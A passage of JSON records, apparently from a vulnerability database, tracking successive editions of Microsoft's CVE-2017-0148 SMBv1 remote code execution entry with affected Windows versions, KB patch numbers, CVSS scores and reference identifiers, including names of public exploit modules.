Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T22:48:26", "differentElements": ["msAffectedSoftware"], "edition": 56}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-18T00:49:58", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBMS16-110, 3187754", "KB4012212", "KB4012215", "KB3210720", "KB4012598", "KB4012213", "KB4013429", "KB3205401", "KB4012606", "KB3213986", "KB3210721", "KB3205409", "KB4013198", "KB4012214", "KB3177186", "KB4012216", "KB3212646", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-18T00:49:58", "differentElements": ["msAffectedSoftware"], "edition": 57}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-18T02:48:09", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-18T02:48:09", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-18T02:48:09", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210720", "KB4012212", "KB4012213", "KB3210721", "KB4013198", "KBMS16-110, 3187754", "KB4012606", "KB3205409", "KB4012217", "KB3205401", "KB3212646", "KB4013429", "KB4012215", "KB3177186", "KB3213986", "KB4012216", "KB4012214", "KB4012598"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-18T02:48:09", "differentElements": ["msAffectedSoftware"], "edition": 58}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-18T18:44:54", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", 